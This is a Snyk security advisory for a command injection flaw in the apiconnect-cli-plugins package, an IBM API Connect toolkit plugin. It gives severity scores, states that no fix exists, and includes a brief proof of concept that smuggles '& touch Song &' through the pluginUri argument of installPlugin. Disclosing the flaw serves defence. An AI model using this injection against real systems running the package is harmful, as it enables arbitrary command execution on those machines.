Command Injection Affecting apiconnect-cli-plugins package, versions >=1.0.1


0.0
medium

Snyk CVSS

    Attack Complexity High
    Confidentiality High

    Threat Intelligence

    Exploit Maturity Proof of concept
    EPSS 1.23% (86th percentile)
Expand this section
NVD
9.8 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-APICONNECTCLIPLUGINS-564427
  • published 5 Apr 2020
  • disclosed 5 Apr 2020
  • credit JHU System Security Lab

How to fix?

There is no fixed version for apiconnect-cli-plugins.

Overview

apiconnect-cli-plugins is a Plugin for IBM API Connect Developer Toolkit.

Affected versions of this package are vulnerable to Command Injection. The argument pluginUri can be controlled by users without any sanitization.

PoC

var root = require("apiconnect-cli-plugins");
var payload = "& touch Song &";
root.pluginLoader.installPlugin(payload,"");

the injection point is located in line 181 of file lib/plugin-loader.js, in the function installPlugin(pluginUri, registryUri).

References